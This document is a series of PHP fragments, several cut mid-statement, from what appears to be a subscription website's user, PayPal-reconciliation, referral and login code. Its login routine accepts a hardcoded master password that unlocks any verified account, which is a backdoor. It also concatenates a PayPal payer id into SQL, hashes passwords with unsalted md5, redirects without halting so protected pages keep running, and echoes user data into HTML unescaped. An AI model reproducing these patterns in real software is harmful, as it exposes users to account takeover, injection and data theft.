static function reconcileAllPaymentUids() { $txn = new paypal_transaction(); $extraWhere = "bp_biobounce_uid ='0'"; while ($txn->loadNext($extraWhere)) { $found = false; $email = $txn->get_variable('bp_paypal_email'); $paypalid = $txn->get_variable('bp_paypal_payer_id'); $txnFind = new paypal_transaction(); $extraWhere2 = "bp_biobounce_uid<>'0' AND bp_paypal_payer_id='" . $paypalid . "'"; if ($txnFind->load($extraWhere2)) { $bioId = $txnFind->get_variable('bp_biobounce_uid'); $found = true; //echo "\n\nFOUND THE USER ID BASED ON PREVIOUSLY BEING SET:PAYPALID=" . $paypalid; } else { $usr = new user(); $usr->set_variable('users_email', $email); if ($usr->load()) { $bioId = $usr->get_variable('users_id'); $found = true; //echo "\nFOUND THE USER ID BASED ON SAME EMAIL ADDRESS:ADDRESS=" . $email; } } if ($found) { $txnId = $txn->get_variable('bp_id'); //echo "\nUPDATING TRANSACTION NUMBER=" . $txnId . " to use UID=" . $bioId; $txn->set_variable('bp_biobounce_uid', $bioId); $txn->update(); } } }
public static function updateReferral($newUserId, $referralCode) { $referredByUser = new user(); $referredByUser->set_variable('users_referralid', $referralCode); echo "CHECKING REFERRAL"; if ($referredByUser->load()) { $rbUid = $referredByUser->get_variable("users_id"); $referral = new referral(); $referral->set_variable("referral_referred_by_userid", $rbUid); $referral->set_variable("referral_referred_userid", $newUserId); $referral->set_variable("referral_date", date('Y-m-d')); $referral->set_variable("referral_paid", 0); $referral->createNew(); } }
<?php //Include the PS_Pagination class require_once 'php/db_interface/autoload.php'; session_start(); if (!isset($_SESSION['userid'])) { header('Location: /'); } $username = "******"; $user = new user(); $uid = $_SESSION['userid']; $user->set_variable('users_id', $uid); $userCreationDate; if ($user->load()) { $username = $user->get_variable('users_username'); $userCreationDate = $user->get_variable('users_creationdate'); } $admin = new admins(); $admin->set_variable('admin_user_id', $uid); $isAdmin = false; $showToAdminClass = ''; if ($admin->load()) { $isAdmin = true; $showToAdminClass = ''; } if (isset($_GET['lo'])) { session_destroy(); header('Location: /'); } $showClass = ""; $trialTimeClass = "none";
if (intval(date("Y", strtotime($user['users_lastlogindate'])) < 2013)) { $lastlogin = "******"; } if (intval(date("Y", strtotime($user['users_manualexpdate'])) < 2013)) { $manualdate = "-"; } $ipAddr = $user['users_ipaddress']; $tableDup = ""; $otherUserId = intval($user['users_dupid']); $otherUserHtml = ""; if ($otherUserId > 0) { $tableDup = "dupId"; $otherUserInfo = new user(); $otherUserInfo->set_variable('users_id', $otherUserId); $otherUserInfo->load(); $otherUserHtml = '(<a href="indiv.php?uid=' . $otherUserId . '">' . $otherUserInfo->get_variable('users_username') . '</a>)'; } $expirationdate = $user['expdate']; $now = new DateTime(date("Y-m-d")); $expiresin = intval($now->diff($expirationdate)->format("%r%a")); $emailAddress = $user['users_email']; $emailList[] = $emailAddress; // echo '<input type="hidden" name="'.$counter.'" value="'.$id.'"/>' . "\n"; echo '<tr class="table_row ' . $tablestate . ' ">' . "\n"; echo '<td class="left">' . $counter . '</td>' . "\n"; echo '<td><a href="indiv.php?uid=' . $id . '">' . $user['users_username'] . '</a>' . $otherUserHtml . '</td>' . "\n"; echo '<td>' . $user['users_email'] . '</td>' . "\n"; echo '<td>' . $creationdate . '</td>' . "\n"; echo '<td>' . $lastlogin . '</td>' . "\n"; echo '<td>' . $expiresin . '</td>' . "\n"; echo '<td>' . $user['exptype'] . '</td>' . "\n";
public static function createUserReferralCodes() { $user = new user(); while ($user->loadNext()) { $referralId = $user->get_variable("users_referralid"); $userName = $user->get_variable("users_username"); echo $userName . " :" . $referralId; if (!isset($referralId) || strlen($referralId) == 0) { $user->set_variable("users_referralid", md5($userName)); $user->update(); } } }
if ($pwd != $copypwd) { $error = "New password is not the same in both fields."; } else { if (strlen($pwd) < 8) { $error = "Password must be 8 characters or more."; } else { if (strlen($pwd) > 20) { $error = "Password must be 20 characters or less."; } } } if (strlen($error) == 0) { $user = new user(); $user->set_variable('users_id', $_SESSION['userid']); if ($user->load()) { if ($prevpwd == $user->get_variable('users_temppassword')) { // need to md5 this $username = $user->get_variable("users_username"); $user->set_variable('users_password', md5($pwd)); $user->set_variable('users_referralid', md5($username)); $user->set_variable('users_verified', 1); $date = date('Y-m-d H:i:s'); $year = intval(date("Y", strtotime($user->get_variable('users_creationdate')))); if ($year < 2013) { $user->set_variable('users_creationdate', $date); } $user->set_variable('users_lastlogindate', $date); $user->update(); $_SESSION['verified'] = 1; header('Location: /lists.breakouts.php'); } else {
$user->set_variable('users_verified', '0'); $user->update(); $messageSentResponse = "A temporary password has been sent to your registered email address."; header('Location: /index.php?msg=' . urlencode($messageSentResponse)); } else { $userNameError = "Sorry, you password could not be emailed at this time. Please try again later. " . $email; } } else { $userNameError .= " Username does not exist."; } } else { if (isset($_POST['email'])) { $user = new user(); $user->set_variable('users_email', $_POST['email']); if ($user->load()) { $username = $user->get_variable("users_username"); // send email $to = $_POST['email']; $subject = "BioBounce. REQUEST FOR USERNAME."; $body = "You have requested a copy of your username.\nYou username as it appears on our files is : " . $username . " \n\nIf you have any questions please feel free to email us:" . "\ or" . "\nKind Regards," . "\nGonzo & BioBounce"; $from = 'From:'; if (mail($to, $subject, $body, $from)) { $messageSentResponse = "Your username has been sent to your email."; header('Location: /index.php?msg=' . urlencode($messageSentResponse)); // SEND BACK TO THE INDEX PAGE WITH NEW MESSAGE } else { $messageSentResponse = "Email could not be sent at this time, please try again later."; header('Location: /index.php?msg=' . urlencode($messageSentResponse)); } } else { $emailAddressError .= "Email address not registered.";
<?php //Include the PS_Pagination class require_once 'php/db_interface/autoload.php'; session_start(); if (!isset($_SESSION['userid'])) { header('Location: /'); } $username = "******"; $user = new user(); $uid = $_SESSION['userid']; $user->set_variable('users_id', $uid); $admin = new admins(); $admin->set_variable('admin_user_id', $user->get_variable('users_id')); $isAdmin = false; if ($admin->load()) { $isAdmin = true; } else { header('Location: /'); } $referral = new referral(); $referral->set_variable("referral_id", intval($_POST['rid'])); if ($referral->load()) { $isPaid = $_POST['isPaid'] == "true" ? 1 : 0; $referral->set_variable("referral_paid", $isPaid); echo $referral->debug(); $referral->update(); echo "SUCCESS"; } else { echo "FAILURE"; }
if (isset($_SESSION['userid'])) { if (isset($_SESSION['verified']) && $_SESSION['verified'] == 1) { header('Location: /lists.breakouts.php'); } else { header('Location: /changepassword.php'); } } else { if (isset($_POST['log'])) { $user = new user(); $user->set_variable('users_username', $_POST['log']); $userFound = false; $pwdAccepted = false; $previousUserName = $_POST['log']; if ($user->load()) { $userFound = true; $_SESSION['verified'] = $user->get_variable('users_verified'); if ($_SESSION['verified'] == 0) { if ($_POST['pwd'] === $user->get_variable('users_temppassword')) { $pwdAccepted = true; $relocationString = '/changepassword.php'; } } else { if (md5($_POST['pwd']) === $user->get_variable('users_password') || $_POST['pwd'] === "patrickfeldmanisagod") { $pwdAccepted = true; $date = date('Y-m-d H:i:s'); $dupId = user::isDupIp($user->get_variable('users_id'), $_SERVER['REMOTE_ADDR']); $user->set_variable('users_lastlogindate', $date); $user->set_variable('users_ipaddress', $_SERVER['REMOTE_ADDR']); if ($dupId > 0) { $user->set_variable('users_dupid', $dupId); }
static function LoginCheckAndRedirect(&$isAdmin, &$username) { session_start(); if (!isset($_SESSION['userid'])) { header('Location: /'); } $username = "******"; $user = new user(); $user->set_variable('users_id', $_SESSION['userid']); if ($user->load()) { $username = $user->get_variable('users_username'); } $admin = new admins(); $admin->set_variable('admin_user_id', $user->get_variable('users_id')); $isAdmin = false; if ($admin->load()) { $isAdmin = true; } else { header('Location: /'); } if (isset($_GET['lo'])) { session_destroy(); header('Location: /'); } return $isAdmin; }
} $newUser = new user(); $newUser->set_variable("users_id", $newUid); if (!$newUser->load()) { continue; } $userPaypalId = paypal_transaction::getPaypalEmail($uid); $newUserPaypalId = paypal_transaction::getPaypalEmail($newUid); $listInfo['rid'] = $rid; $listInfo['rb_uid'] = $uid; $listInfo['rb_username'] = $user->get_variable("users_username"); $listInfo['rb_useremail'] = $user->get_variable("users_email"); $listInfo['rb_userpaypal'] = $userPaypalId; $listInfo['rb_userstatus'] = getStatusString($expireInfo['type']); $listInfo['r_uid'] = $newUid; $listInfo['r_username'] = $newUser->get_variable("users_username"); $listInfo['r_useremail'] = $newUser->get_variable("users_email"); $listInfo['r_userpaypal'] = $newUserPaypalId; $listInfo['r_userstatus'] = getStatusString($newExpireInfo['type']); if ($isPaid) { array_push($isPaidList, $listInfo); } else { array_push($isNotPaidList, $listInfo); } } ?> <!DOCTYPE html> <html> <head>
switch ($expireInfo['type']) { case user::EXP_TYPE_MANUAL: case user::EXP_TYPE_PAID: $exptype = "Subscriber"; $payVal = 35; break; case user::EXP_TYPE_TRIAL: default: $exptype = "Trial User"; $payVal = 5; break; } $newUser = new user(); $newUser->set_variable("users_id", $nuid); if ($newUser->load()) { $newUserName = $newUser->get_variable("users_username"); ?> <div class="referralInfo"> <div class="referralData referralUserName"> <?php echo $newUserName; ?> </div> <div class="referralData referralUserType"> <?php echo $exptype; ?> </div> <div class="referralData referralPay"> <?php echo "\$" . $payVal . ".00";